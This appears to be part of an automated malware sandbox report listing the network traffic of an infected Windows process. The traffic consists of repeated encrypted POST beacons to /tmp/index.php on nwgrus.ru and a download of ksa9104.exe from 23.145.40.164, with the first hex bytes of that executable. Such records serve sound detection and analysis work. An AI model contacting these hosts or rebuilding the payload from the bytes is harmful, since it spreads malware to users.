                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                        Oct 7, 2024 14:59:56.016052008 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:55 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.2.549982105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:56.027776003 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://bqpiqprsuajpd.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 149
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:56.027798891 CEST149OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 3e 2f c1 bc
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu>/Pq +<g(-&XsKF\9Iz#sS1$
                                        Oct 7, 2024 14:59:57.166579962 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:56 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.2.549993105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:57.417840958 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://fsqorqnhaeehy.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 230
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:57.417864084 CEST230OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 47 37 fa bc
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuG7qWAa_nwoTWO%pIl4zIfFY^cu!SiF?0i.87`AE>W'L-5"Ud[
                                        Oct 7, 2024 14:59:58.324579954 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:58 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        33192.168.2.549998105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:58.333836079 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://eihhylujhlro.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 360
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:58.333861113 CEST360OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 4b 29 fb 96
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuK)MBP^~9[&rgD;C/7:Jx(Y(mn*@5FLuAe1_9KA#+!hgXF`DP`WGjQ)
                                        Oct 7, 2024 14:59:59.252855062 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:59 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        34192.168.2.550014105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 15:01:05.021487951 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://qcgaudpuoiuttos.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 249
                                        Host: nwgrus.ru
                                        Oct 7, 2024 15:01:05.021508932 CEST249OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 3b e8 b7
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vuQ;EVln%]M!bw4bUwY6W=JIG[gGb"/m'ow?vVdN"7.A4(JU]+xm^;(*k
                                        Oct 7, 2024 15:01:05.953011990 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:01:05 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        35192.168.2.550015105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 15:01:14.439160109 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://mhqikqiwjyotw.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 205
                                        Host: nwgrus.ru
                                        Oct 7, 2024 15:01:14.439188004 CEST205OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 02 c2 ad
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vu+y]FBNavw'O;@Vw:d5-MAF~s)fs([2>zzV)Y
                                        Oct 7, 2024 15:01:15.347242117 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:01:15 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        36192.168.2.550016105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 15:01:26.161711931 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://dymavinnaeuaxxm.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 346
                                        Host: nwgrus.ru
                                        Oct 7, 2024 15:01:26.161739111 CEST346OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 5e ff 9e
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vu~^W*~>O.ydh42hsGT2(DfOMRt5.zS{L3<uXy89;CfC'>}V8(,l
                                        Oct 7, 2024 15:01:27.088217020 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:01:26 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        37192.168.2.550019105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 15:01:44.417134047 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://xuqynkrewbaraj.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 238
                                        Host: nwgrus.ru
                                        Oct 7, 2024 15:01:44.417171001 CEST238OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 32 d2 fa
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vu!2\vgofKRIK$D/cb~M0\2'.}M*%71y?bR|/noBVi52Xox69An
                                        Oct 7, 2024 15:01:46.179423094 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:01:45 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r
                                        Oct 7, 2024 15:01:46.180727959 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:01:45 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r
                                        Oct 7, 2024 15:01:46.181176901 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:01:45 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        38192.168.2.550022189.195.132.134801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 15:02:06.908350945 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://niarphxxbktdxvwh.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 339
                                        Host: nwgrus.ru
                                        Oct 7, 2024 15:02:06.908404112 CEST339OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 45 aa f4
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vusEo7\!8pLq9["FhB+T_TZc|ZV$k6q9B5q\&-6B!F#hjDh.hs4,'3
                                        Oct 7, 2024 15:02:07.858335972 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:02:07 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        39192.168.2.550025189.195.132.134801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 15:02:28.926256895 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://lqpnyjpucaq.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 132
                                        Host: nwgrus.ru
                                        Oct 7, 2024 15:02:28.926287889 CEST132OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 07 d6 b8
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vuF/Nb^=evZd|5'2m$wx
                                        Oct 7, 2024 15:02:29.863377094 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:02:29 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        40192.168.2.550028189.195.132.134801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 15:02:50.000724077 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://akokgrlutaukqvq.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 348
                                        Host: nwgrus.ru
                                        Oct 7, 2024 15:02:50.000741959 CEST348OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 48 be 91
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vu;HsWGR{}?a2*@(4Ef*5E/1W*>k~2?Q5l~G\$JmUSD>YQ}~cC>zlGh/Rw
                                        Oct 7, 2024 15:02:50.926397085 CEST151INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 13:02:50 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 03 00 00 00 72 e8 84
                                        Data Ascii: r


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.54993223.145.40.1644431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 12:59:47 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: 23.145.40.164
                                        2024-10-07 12:59:47 UTC327INHTTP/1.1 200 OK
                                        Date: Mon, 07 Oct 2024 12:59:47 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Last-Modified: Mon, 07 Oct 2024 12:45:02 GMT
                                        ETag: "6ce00-623e263b8c9a0"
                                        Accept-Ranges: bytes
                                        Content-Length: 445952
                                        Connection: close
                                        Content-Type: application/x-msdos-program
                                        2024-10-07 12:59:47 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 81 bc 0c d7 e0 d2 5f d7 e0 d2 5f d7 e0 d2 5f b8 96 4c 5f cf e0 d2 5f b8 96 79 5f f1 e0 d2 5f b8 96 78 5f 8b e0 d2 5f de 98 41 5f d0 e0 d2 5f d7 e0 d3 5f 53 e0 d2 5f b8 96 7d 5f d6 e0 d2 5f b8 96 48 5f d6 e0 d2 5f b8 96 4f 5f d6 e0 d2 5f 52 69 63 68 d7 e0 d2 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f8 8d ee 65 00 00 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$___L__y__x__A___S_}__H__O__Rich_PELe
                                        2024-10-07 12:59:48 UTC8000INData Raw: c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 fc 2b 40 00 8b ff f7 d9 ff 24 8d ac 2b 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 00 2b 40 00 ff 24 8d fc 2b 40 00 90 10 2b 40 00 34 2b 40 00 5c 2b 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 fc 2b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 fc 2b 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 fc 2b 40 00 8d 49 00 b0 2b 40 00 b8 2b 40 00 c0 2b 40 00 c8 2b 40 00 d0 2b 40 00 d8 2b 40 00 e0 2b 40 00 f3 2b 40 00 8b 44 8e 1c 89 44 8f 1c
                                        Data Ascii: u$r$+@$+@Ir+$+@$+@+@4+@\+@F#Gr$+@IF#GFGr$+@F#GFGFGV$+@I+@+@+@+@+@+@+@+@DD
